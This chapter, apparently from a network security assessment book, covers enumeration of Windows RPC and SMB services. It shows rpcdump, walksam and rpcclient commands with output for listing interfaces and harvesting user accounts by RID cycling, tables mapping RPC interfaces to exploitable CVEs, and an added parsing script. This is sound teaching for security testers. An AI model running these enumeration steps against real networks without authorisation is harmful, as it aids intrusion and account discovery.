Chapter 10. Assessing Windows Networking Services

This chapter focuses on Microsoft RPC, NetBIOS, and CIFS services that are used in large internal networks to support file sharing, printing, and other functions. If these services aren’t configured or protected properly by network filtering devices, they can be used to great effect to enumerate system details and cause a complete network compromise.

Microsoft Windows Networking Services

Microsoft Windows networking services use the following ports:

loc-srv         135/tcp
loc-srv         135/udp
netbios-ns      137/udp
netbios-dgm     138/udp
netbios-ssn     139/tcp
microsoft-ds    445/tcp
microsoft-ds    445/udp

Port 135 is used for RPC client-server communication, and ports 139 and 445 are used for authentication and file sharing. UDP ports 137 and 138 are used for local NetBIOS browser, naming, and lookup functions.

SMB, CIFS, and NetBIOS

The Server Message Block (SMB) protocol facilitates resource sharing in Microsoft Windows environments. Under Windows NT, SMB is run through NetBIOS over TCP/IP, using UDP ports 137 and 138 and TCP port 139. Windows 2000 and later support Common Internet File System (CIFS), which provides full SMB access directly through TCP and UDP port 445 (as opposed to using a variety of UDP and TCP ports). Many system administrators diligently filter access to ports between 135 and 139, but have been known to neglect port 445 when protecting Windows 2000, XP, 2003, and Vista hosts.

Microsoft RPC Services

The Microsoft RPC endpoint mapper (also known as the DCE locator service) listens on both TCP and UDP port 135, and works much like the Sun RPC portmapper service found in Unix environments. Examples of Microsoft applications and services that use port 135 for endpoint mapping include Outlook, Exchange, and the Messenger Service.

Tip

Depending on the host configuration, the RPC endpoint mapper can be accessed through TCP and UDP port 135 via SMB with a null or authenticated session (through TCP ports 139 and 445), and as a web service listening on TCP port 593. For more information, see Todd Sabin’s presentation titled “Windows 2000, NULL Sessions and MSRPC.” Look for it at http://www.bindview.com/services/razor/resources/nullsess.ppt.

Assessment of RPC services includes the following:

  • Enumerating accessible RPC server interfaces and information gathering

  • Identifying vulnerable RPC server interfaces and components

  • Gleaning user and system details through LSA service interfaces (including SAMR and LSARPC)

  • Brute-forcing user passwords through the DCOM WMI subsystem

  • Executing commands through the Task Scheduler service

  • Starting and stopping services through the Service Control Manager (svcctl) interface

Following is a breakdown of these tasks, along with details of respective tools and techniques.

Enumerating Accessible RPC Server Interfaces

Through the RPC endpoint mapper, you can enumerate IP addresses of network interfaces (which will sometimes reveal internal network information), along with details of RPC services using dynamic high ports. The following tools can mine information from the endpoint mapper:

epdump (http://www.packetstormsecurity.org/nt/audit/epdump.zip)
rpctools (http://www.bindview.com/services/razor/utilities/windows/rpctools1.0-readme.cfm)
RpcScan (http://www.securityfriday.com/tools/rpcscan.html)

epdump

epdump is a Microsoft command-line utility found in the Microsoft Windows Resource Kit. Example 10-1 uses epdump to query the RPC endpoint mapper running on 192.168.189.1 (through TCP port 135).

Example 10-1. Using epdump to enumerate RPC interfaces
C:\> epdump 192.168.189.1
binding is 'ncacn_ip_tcp:192.168.189.1'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncadg_ip_udp:192.168.0.1[1028]
  annot 'Messenger Service'
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  binding 00000000-000000000000@ncalrpc:[LRPC00000284.00000001]
  annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:62.232.8.1[1025]
  annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:192.168.170.1[1025]
  annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:192.168.189.1[1025]
  annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:192.168.0.1[1025]
  annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
  binding 00000000-000000000000@ncalrpc:[LRPC00000284.00000001]
  annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:62.232.8.1[1025]
  annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:192.168.170.1[1025]
  annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:192.168.189.1[1025]
  annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:192.168.0.1[1025]
  annot ''
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncalrpc:[ntsvcs]
  annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncacn_np:\\WEBSERV[\PIPE\ntsvcs]
  annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncacn_np:\\WEBSERV[\PIPE\scerpc]
  annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncalrpc:[DNSResolver]
  annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncadg_ip_udp:62.232.8.1[1028]
  annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncadg_ip_udp:192.168.170.1[1028]
  annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncadg_ip_udp:192.168.189.1[1028]
  annot 'Messenger Service'
no more entries

The responses to this query show that the NetBIOS name of the host is WEBSERV, and there are four network interfaces with the following IP addresses:

62.232.8.1
192.168.0.1
192.168.170.1
192.168.189.1

Analysis of the RPC services that are running reveals that the Messenger Service is accessible through UDP port 1028, along with two named pipes: \PIPE\ntsvcs and \PIPE\scerpc. Named pipes are accessible through SMB upon authenticating with the NetBIOS session or CIFS services.

Servers running Microsoft Exchange return many details of subsystems that are run as RPC services, and so hundreds of results are returned when using tools such as epdump and rpcdump. The useful information includes details of internal network interfaces and RPC services running on high dynamic ports, which you can use to clarify port scan results.

Many of the RPC services listed through epdump don’t have a plaintext annotation (as the Messenger service does in Example 10-1). An example of an accessible RPC service listed without annotation is as follows:

int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
   binding 00000000-000000000000@ncacn_ip_tcp:192.168.189.1[1025]
   annot ''

From this information you can see that this is an RPC endpoint accessible through TCP port 1025 on 192.168.189.1, but the only identifier for the service is a 128-bit UUID written as a hex string. This string is known as the interface ID (IFID) value.

rpctools (rpcdump and ifids)

Todd Sabin wrote two Windows utilities (rpcdump and ifids), used to query the RPC endpoint mapper using specific protocol sequences and to query specific RPC endpoints directly. The rpcdump tool can enumerate RPC service information through various protocol sequences. Its usage is as follows:

            rpcdump [-v] [-p protseq] target

One of four protocol sequences can be used to access the RPC endpoint mapper, as follows:

ncacn_np (\pipe\epmapper named pipe through SMB)
ncacn_ip_tcp (direct access to TCP port 135)
ncadg_ip_udp (direct access to UDP port 135)
ncacn_http (RPC over HTTP on TCP port 80, 593, or others)

The -v option enables verbosity so that rpcdump will enumerate all registered RPC interfaces. The -p option allows you to specify a particular protocol sequence to use for talking to the endpoint mapper. If none is specified, rpcdump tries all four protocol sequences.

rpcdump can be run much like epdump from the command line to dump details of network interfaces, IP addresses, and RPC servers. Example 10-2 shows rpcdump running to list all registered RPC endpoints through TCP port 135.

Example 10-2. Using rpcdump to enumerate RPC interfaces
D:\rpctools> rpcdump 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncalrpc:[LRPC00000290.00000001]

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_ip_tcp:192.168.0.1[1025]

Using the verbose flag, you can walk and enumerate all IFID values for each registered endpoint. First, port 135 is queried, followed by each registered endpoint (UDP port 1028, TCP port 1025, etc.). Example 10-3 shows rpcdump used in this way to fully list all registered RPC endpoints and interfaces.

Example 10-3. Fully listing all registered RPC endpoints and interfaces
D:\rpctools> rpcdump -v 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]
RpcMgmtInqIfIds succeeded
Interfaces: 16
  367abb81-9844-35f1-ad32-98f038001003 v2.0
  93149ca2-973b-11d1-8c39-00c04fb984f9 v0.0
  82273fdc-e32a-18c3-3f78-827929dc23ea v0.0
  65a93890-fab9-43a3-b2a5-1e330ac28f11 v2.0
  8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0
  6bffd098-a112-3610-9833-46c3f87e345a v1.0
  8d0ffe72-d252-11d0-bf8f-00c04fd9126b v1.0
  c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0
  0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0
  4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
  300f3532-38cc-11d0-a3f0-0020af6b0add v1.2
  6bffd098-a112-3610-9833-012892020162 v0.0
  17fdd703-1827-4e34-79d4-24a55c53bb37 v1.0
  5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  3ba0ffc0-93fc-11d0-a4ec-00a0c9062910 v1.0
  8c7daf44-b6dc-11d1-9a4c-0020af6e7c57 v1.0

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncalrpc:[LRPC00000290.00000001]

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_ip_tcp:192.168.0.1[1025]
RpcMgmtInqIfIds succeeded
Interfaces: 2
  1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0

If you can’t connect to the portmapper through TCP port 135, use UDP port 135 to enumerate registered RPC endpoints with the -p ncadg_ip_udp option, shown in Example 10-4.

Example 10-4. Listing registered RPC endpoints through UDP port 135
D:\rpctools> rpcdump -p ncadg_ip_udp 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncalrpc:[LRPC00000290.00000001]

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_ip_tcp:192.168.0.1[1025]

The ifids utility queries specific RPC endpoints (such as UDP 1029 or TCP 1025) to identify accessible services. A practical application of the ifids utility is to enumerate RPC services running on high ports when the RPC portmapper service isn’t accessible.

The ifids usage is:

            ifids [-p protseq] [-e endpoint]target

The -p option specifies which protocol sequence to use when talking to the server, and the -e option specifies which port to connect to. In Example 10-5, I use ifids to connect to TCP port 1025 and list the accessible interfaces.

Example 10-5. Enumerating interface information using ifids
D:\rpctools> ifids -p ncacn_ip_tcp -e 1025 192.168.189.1
Interfaces: 2
  1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0

By referring to the list of known IFID values, you can see that these two interfaces are Microsoft Task Scheduler (mstask.exe) listeners. Example 10-6 shows how to use the ifids tool to enumerate the IFID values of RPC services accessible through UDP port 1028.

Example 10-6. Enumerating interfaces accessible through UDP port 1028
D:\rpctools> ifids -p ncadg_ip_udp -e 1028 192.168.189.1
Interfaces: 16
  367abb81-9844-35f1-ad32-98f038001003 v2.0
  93149ca2-973b-11d1-8c39-00c04fb984f9 v0.0
  82273fdc-e32a-18c3-3f78-827929dc23ea v0.0
  65a93890-fab9-43a3-b2a5-1e330ac28f11 v2.0
  8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0
  6bffd098-a112-3610-9833-46c3f87e345a v1.0
  8d0ffe72-d252-11d0-bf8f-00c04fd9126b v1.0
  c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0
  0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0
  4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
  300f3532-38cc-11d0-a3f0-0020af6b0add v1.2
  6bffd098-a112-3610-9833-012892020162 v0.0
  17fdd703-1827-4e34-79d4-24a55c53bb37 v1.0
  5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  3ba0ffc0-93fc-11d0-a4ec-00a0c9062910 v1.0
  8c7daf44-b6dc-11d1-9a4c-0020af6e7c57 v1.0

RpcScan

Urity (http://www.securityfriday.com) wrote a graphical Windows version of the rpcdump tool called RpcScan. In the same way rpcdump -v works, RpcScan queries each registered RPC endpoint and enumerates all the IFID values. Urity spent time researching IFID values and idiosyncrasies, referencing them in the RpcScan output. Figure 10-1 shows the tool in use against 192.168.189.1.

Figure 10-1. RpcScan graphically displays IFID values and references

Identifying Vulnerable RPC Server Interfaces

Upon enumerating accessible RPC endpoints and associated IFID values, it is necessary to cross-reference them with known Microsoft RPC service issues, and further test them using exploitation frameworks and similar tools. Table 10-1 lists IFID values that have known remotely exploitable issues, as found in MITRE CVE. Table 10-2 lists other useful IFID values that can be used to enumerate users, perform password grinding, and execute commands.

Table 10-1. IFID values with known remotely exploitable issues

IFID                                   Service details                                      CVE reference(s)
12345678-1234-abcd-ef00-0123456789ab   Print spooler service                                CVE-2005-1984
17fdd703-1827-4e34-79d4-24a55c53bb37   Messenger service                                    CVE-2003-0717
2f5f3220-c126-1076-b549-074d078619da   NetDDE service                                       CVE-2004-0206
2f5f6520-ca46-1067-b319-00dd010662da   Telephony service                                    CVE-2005-0058
342cfd40-3c6c-11ce-a893-08002b2e9c6d   License and Logging Service (LLSSRV) interface       CVE-2005-0050
3919286a-b10c-11d0-9ba8-00c04fd92ef5   LSASS interface                                      CVE-2003-0533
4b324fc8-1670-01d3-1278-5a47bf6ee188   Server service                                       CVE-2005-0051, CVE-2006-3439
4d9f4ab8-7d1c-11cf-861e-0020af6e7c57   DCOM interface                                       CVE-2003-0352, CVE-2003-0528, CVE-2003-0715, CVE-2004-0124
50abc2a4-574d-40b3-9d66-ee4fd5fba076   DNS server service                                   CVE-2007-1748
5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc   Messenger service                                    CVE-2003-0717
6bffd098-a112-3610-9833-46c3f87e345a   Workstation service                                  CVE-2003-0812, CVE-2006-4691
8d9f4e40-a03d-11ce-8f69-08003e30051b   Plug and Play service                                CVE-2005-1983, CVE-2005-2120
8f09f000-b7ed-11ce-bbd2-00001a181cad   Remote Access Service Manager (RASMAN) interface     CVE-2006-2370, CVE-2006-2371
c8cb7687-e6d3-11d2-a958-00c04f682e16   WebDAV client service                                CVE-2006-0013
d6d70ef0-0e3b-11cb-acc3-08002b1d29c3   RPC locator service                                  CVE-2003-0003
e67ab081-9844-3521-9d32-834f038001c0   Client service for NetWare                           CVE-2005-1985, CVE-2006-4688
e1af8308-5d1f-11c9-91a4-08002b14a0fa   RPC endpoint mapper                                  CVE-2002-1561
fdb3a030-065f-11d1-bb9b-00a024ea5525   Message Queuing (MSMQ) and MSDTC services            CVE-2005-0059, CVE-2005-2119, CVE-2006-0034, CVE-2006-1184

Table 10-2. Other useful MSRPC interfaces

IFID                                   Service comments
12345778-1234-abcd-ef00-0123456789ab   LSA interface (LSARPC), used to enumerate users
12345778-1234-abcd-ef00-0123456789ac   LSA SAMR interface, used to access the public components of the SAM database, including usernames
1ff70682-0a51-30e8-076d-740be8cee98b   Task Scheduler, used to remotely execute commands (with a valid username/password)
338cd001-2244-31f1-aaaa-900038001003   Remote registry service, used to remotely access and modify the system registry (depending on permissions and access rights)
367abb81-9844-35f1-ad32-98f038001003   Service Control Manager (svcctl), used to remotely start and stop services on the host
4b324fc8-1670-01d3-1278-5a47bf6ee188   Server service (srvsvc), used to enumerate shares, sessions, and server information
4d9f4ab8-7d1c-11cf-861e-0020af6e7c57   DCOM WMI interface, used for brute-force password grinding and information gathering

Tip

If administrative credentials are known (such as the Administrator account password), the LSA and SAMR interfaces can be used to add users and elevate rights and privileges accordingly. These commands and issues are discussed in the following sections.

I only cover Microsoft RPC endpoints with significant security implications here. Jean-Baptiste Marchand has assembled an excellent series of documents that cover Microsoft RPC interfaces and named pipe endpoints. His “Windows network services internals” page should be reviewed for current up-to-date details of Microsoft RPC issues, accessible at http://www.hsc.fr/ressources/articles/win_net_srv/.
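The enumeration and cross-referencing described above is tedious by hand once a host exposes dozens of endpoints, so the following added example (not part of the book or of Todd Sabin’s rpctools) parses `rpcdump -v` output, collects the IP addresses and NetBIOS names it leaks, groups the IFIDs behind each network-reachable endpoint, and flags the ones that Table 10-1 ties to a CVE. The IFID table inside the script is a subset of Tables 10-1 and 10-2; the sample output is constructed from Examples 10-1 and 10-3, with the ncacn_np entry modelled on epdump’s binding line. Local-only ncalrpc bindings are ignored because they cannot be reached over the network.

```python
import re

# IFID -> (service, CVEs): the rows of Tables 10-1 and 10-2 that appear in the
# chapter's examples. Extend with the remaining rows as needed.
KNOWN_IFIDS = {
    "5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc": ("Messenger service", ["CVE-2003-0717"]),
    "17fdd703-1827-4e34-79d4-24a55c53bb37": ("Messenger service", ["CVE-2003-0717"]),
    "4b324fc8-1670-01d3-1278-5a47bf6ee188": ("Server service", ["CVE-2005-0051", "CVE-2006-3439"]),
    "6bffd098-a112-3610-9833-46c3f87e345a": ("Workstation service", ["CVE-2003-0812", "CVE-2006-4691"]),
    "8d9f4e40-a03d-11ce-8f69-08003e30051b": ("Plug and Play service", ["CVE-2005-1983", "CVE-2005-2120"]),
    "1ff70682-0a51-30e8-076d-740be8cee98b": ("Task Scheduler", []),
    "12345778-1234-abcd-ef00-0123456789ac": ("SAMR", []),
    "367abb81-9844-35f1-ad32-98f038001003": ("Service Control Manager (svcctl)", []),
}

BINDING_RE = re.compile(r"^(?P<proto>[a-z_]+):(?P<host>[^\[]*)\[(?P<ep>[^\]]*)\]$")
IFID_RE = re.compile(r"^([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}) v\d+\.\d+$", re.I)

def parse_rpcdump(text):
    """Split `rpcdump -v` output into one record per registered endpoint. Each record
    carries the advertised IfId plus every IFID that RpcMgmtInqIfIds returned for it."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:                       # blank line ends the current record
            cur = None
            continue
        if line.startswith("IfId:"):
            ifid = line.split()[1].lower()
            cur = {"ifid": ifid, "annotation": "", "binding": None, "interfaces": {ifid}}
            records.append(cur)
        elif cur is None:
            continue
        elif line.startswith("Annotation:"):
            cur["annotation"] = line[len("Annotation:"):].strip()
        elif line.startswith("Binding:"):
            m = BINDING_RE.match(line[len("Binding:"):].strip())
            cur["binding"] = m.groupdict() if m else None
        else:
            m = IFID_RE.match(line)        # lines under "Interfaces: N"
            if m:
                cur["interfaces"].add(m.group(1).lower())
    return records

def summarise_endpoints(records):
    """Collect IP addresses, NetBIOS names, and the IFIDs behind each network endpoint."""
    ips, names, endpoints = set(), set(), {}
    for r in records:
        b = r["binding"]
        if not b or b["proto"] == "ncalrpc":       # local-only bindings are not reachable
            continue
        if b["proto"] in ("ncacn_ip_tcp", "ncadg_ip_udp"):
            ips.add(b["host"])
        elif b["proto"] == "ncacn_np":
            names.add(b["host"].lstrip("\\"))      # \\WEBSERV -> WEBSERV
        endpoints.setdefault((b["proto"], b["host"], b["ep"]), set()).update(r["interfaces"])
    return {"ips": sorted(ips), "netbios_names": sorted(names), "endpoints": endpoints}

def cross_reference(summary):
    """Network-reachable IFIDs that Table 10-1 ties to a CVE, with the endpoints exposing them."""
    hits = {}
    for key, ifids in summary["endpoints"].items():
        for ifid in ifids:
            if ifid in KNOWN_IFIDS and KNOWN_IFIDS[ifid][1]:
                hits.setdefault(ifid, []).append(key)
    return [(ifid, KNOWN_IFIDS[ifid][0], KNOWN_IFIDS[ifid][1], sorted(eps))
            for ifid, eps in sorted(hits.items())]

# Constructed sample, assembled from Examples 10-1 and 10-3 (not a real capture).
SAMPLE_RPCDUMP = r"""
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]
RpcMgmtInqIfIds succeeded
Interfaces: 4
  367abb81-9844-35f1-ad32-98f038001003 v2.0
  6bffd098-a112-3610-9833-46c3f87e345a v1.0
  4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
  5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncalrpc:[LRPC00000290.00000001]

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_ip_tcp:192.168.0.1[1025]
RpcMgmtInqIfIds succeeded
Interfaces: 2
  1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0

IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_np:\\WEBSERV[\PIPE\ntsvcs]
"""

if __name__ == "__main__":
    summary = summarise_endpoints(parse_rpcdump(SAMPLE_RPCDUMP))
    print("addresses:", summary["ips"], "names:", summary["netbios_names"])
    for ifid, service, cves, eps in cross_reference(summary):
        print("%s %s (%s)" % (ifid, service, ", ".join(cves)))
        for proto, host, ep in eps:
            print("    %s:%s[%s]" % (proto, host, ep))
```

Feed it the saved output of `rpcdump -v target` and use the listed endpoints to focus the exploitation-framework checks described in the next section; an IFID reported here only means the interface is registered and reachable, not that the host is unpatched.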

Microsoft RPC interface process manipulation bugs

A number of remotely exploitable RPC interface issues have been publicized over recent years, as listed in Table 10-3. Many of them have exploit modules in Core IMPACT, Immunity CANVAS, and the Metasploit Framework (MSF); check each framework’s current module list for coverage of a given advisory.

Table 10-3. Remotely exploitable MSRPC vulnerabilities

CVE reference(s)                   Advisory   Notes
CVE-2007-1748                      MS07-029   DNS server service interface zone name overflow
CVE-2006-4691                      MS06-070   Workstation service overflow
CVE-2006-4688                      MS06-066   Microsoft NetWare client service overflow
CVE-2006-3439                      MS06-040   Server service overflow
CVE-2006-2371                      MS06-025   Remote Access Service Manager (RASMAN) registry corruption vulnerability
CVE-2006-2370                      MS06-025   Routing and Remote Access Service (RRAS) memory corruption vulnerability
CVE-2005-1985                      MS05-046   Microsoft NetWare client service overflow
CVE-2005-1984                      MS05-043   Print spooler service overflow
CVE-2005-1983                      MS05-039   Plug and Play service overflow
CVE-2005-0059                      MS05-017   Message Queuing (MSMQ) RPC overflow
CVE-2005-0058                      MS05-040   Telephony service overflow
CVE-2005-0050                      MS05-010   License and Logging Service (LLSSRV) overflow
CVE-2004-0206                      MS04-031   NetDDE service overflow
CVE-2003-0818                      MS04-007   Local Security Authority Subsystem Service (LSASS) ASN.1 overflow
CVE-2003-0812                      MS03-049   Workstation service overflow
CVE-2003-0717                      MS03-043   Messenger service overflow
CVE-2003-0715 and CVE-2003-0528    MS03-039   DCOM interface heap overflows
CVE-2003-0533                      MS04-011   Local Security Authority Subsystem Service (LSASS) overflow
CVE-2003-0352                      MS03-026   DCOM interface stack overflow
CVE-2003-0003                      MS03-001   RPC locator service overflow

Tip

A number of these issues, including CVE-2006-3439 (Server service overflow) and CVE-2003-0533 (LSASS overflow) are also exploitable through named pipes, depending on configuration and network filtering, accessible via NetBIOS (TCP port 139) and CIFS (TCP port 445). CVE-2003-0818 is exploitable through any mechanism supporting NTLM authentication, including NetBIOS (SMB), HTTP, and SMTP.

Gleaning User Details via SAMR and LSARPC Interfaces

A number of RPC queries can be issued to accessible LSARPC and SAMR RPC service endpoints (running over TCP, UDP, HTTP, or named pipes). Named pipes access is provided across SMB sessions, accessible via the NetBIOS session service (TCP port 139), and CIFS service (TCP port 445).

walksam

The walksam utility (found in Todd Sabin’s rpctools package) queries the SAMR named pipe interface (\pipe\samr) to glean user information. Example 10-7 shows walksam being used across a local Windows network to walk the SAMR interface of 192.168.1.1.

Example 10-7. Using walksam over SMB and named pipes
D:\rpctools> walksam 192.168.1.1
rid 500: user Administrator
Userid: Administrator
Description: Built-in account for administering the computer/domain
Last Logon:  8/12/2003 19:16:44.375
Last Logoff:  never
Last Passwd Change:  8/13/2002 18:43:52.468
Acct. Expires:  never
Allowed Passwd Change:  8/13/2002 18:43:52.468
Rid: 500
Primary Group Rid: 513
Flags: 0x210
Fields Present: 0xffffff
Bad Password Count: 0
Num Logons: 101

rid 501: user Guest
Userid: Guest
Description: Built-in account for guest access to the computer/domain
Last Logon:  never
Last Logoff:  never
Last Passwd Change:  never
Acct. Expires:  never
Allowed Passwd Change:  never
Rid: 501
Primary Group Rid: 513
Flags: 0x215
Fields Present: 0xffffff
Bad Password Count: 0
Num Logons: 0

The walksam utility also supports additional protocol sequences used by Windows 2000 Domain Controllers. The SAMR interface must first be found (IFID 12345778-1234-abcd-ef00-0123456789ac) using rpcdump or a similar tool to list all the registered endpoints; it’s then accessed using walksam with the correct protocol sequence (over named pipes, TCP, UDP, or HTTP).

Tip

Windows enumeration tools, such as walksam, that use RID cycling to list users (through looking up RID 500, 501, 502, etc.) identify the administrator account, even if it has been renamed.

Example 10-8 shows walksam in use against a Windows 2000 domain controller running a SAMR interface through the ncacn_ip_tcp endpoint at TCP port 1028.

Example 10-8. Using walksam to list user details through TCP port 1028
D:\rpctools> walksam -p ncacn_ip_tcp -e 1028 192.168.1.10
rid 500: user Administrator
Userid: Administrator
Description: Built-in account for administering the computer/domain
Last Logon:  8/6/2003 11:42:12.725
Last Logoff:  never
Last Passwd Change:  2/11/2003 09:12:50.002
Acct. Expires:  never
Allowed Passwd Change:  2/11/2003 09:12:50.002
Rid: 500
Primary Group Rid: 513
Flags: 0x210
Fields Present: 0xffffff
Bad Password Count: 0
Num Logons: 101

Accessing RPC interfaces over SMB and named pipes using rpcclient

rpcclient (part of the Unix Samba package from http://www.samba.org) can be used to interact with RPC service endpoints across SMB and named pipes (accessible through the NetBIOS session and CIFS services). The tool has an extraordinary number of features and usage options—far too many to list here. Before using the rpcclient tool, I recommend that you review http://www.samba-tng.org/docs/tng/htmldocs/rpcclient.8.html. Table 10-4 lists the useful SAMR and LSARPC interface commands that can be issued through the rpcclient utility upon establishing an SMB session.

By default, Windows NT 4.0 and Windows 2000 systems, and Windows Server 2003 domain controllers, allow anonymous (null session) access to SMB, so these interfaces can be queried in this way. If null session access to SMB is not permitted, a valid username and password must be provided to access the LSARPC and SAMR interfaces.

Table 10-4. Useful rpcclient commands

Command               Interface   Description
queryuser             SAMR        Retrieve user information
querygroup            SAMR        Retrieve group information
querydominfo          SAMR        Retrieve domain information
enumdomusers          SAMR        Enumerate domain users
enumdomgroups         SAMR        Enumerate domain groups
createdomuser         SAMR        Create a domain user
deletedomuser         SAMR        Delete a domain user
lookupnames           LSARPC      Look up usernames to SID values
lookupsids            LSARPC      Look up SIDs to usernames (RID cycling)
lsaaddacctrights      LSARPC      Add rights to a user account
lsaremoveacctrights   LSARPC      Remove rights from a user account

Example 10-9 shows rpcclient in use against a remote system at 192.168.0.25 to perform RID cycling and enumerate users through the LSARPC named pipe (\pipe\lsarpc). In this example we first look up the full SID value of the chris account, and then increment the RID value (1001 through to 1007) to enumerate the other user accounts through the LSARPC interface.

Example 10-9. RID cycling through rpcclient and the LSARPC interface
$ rpcclient -I 192.168.0.25 -U=chris%password WEBSERV
rpcclient> lookupnames chris
chris S-1-5-21-1177238915-1563985344-1957994488-1003 (User: 1)
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1001
S-1-5-21-1177238915-1563985344-1957994488-1001 WEBSERV\IUSR_WEBSERV
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1002
S-1-5-21-1177238915-1563985344-1957994488-1002 WEBSERV\IWAM_WEBSERV
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1003
S-1-5-21-1177238915-1563985344-1957994488-1003 WEBSERV\chris
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1004
S-1-5-21-1177238915-1563985344-1957994488-1004 WEBSERV\donald
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1005
S-1-5-21-1177238915-1563985344-1957994488-1005 WEBSERV\test
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1006
S-1-5-21-1177238915-1563985344-1957994488-1006 WEBSERV\daffy
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1007
result was NT_STATUS_NONE_MAPPED
rpcclient>

Alternatively, you can use the enumdomusers command to simply list all users through a forward lookup (this technique will not work if RestrictAnonymous=1, and RID cycling must be used), as shown in Example 10-10.

Example 10-10. Enumerating users through the SAMR interface
rpcclient> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[chris] rid:[0x3eb]
user:[daffy] rid:[0x3ee]
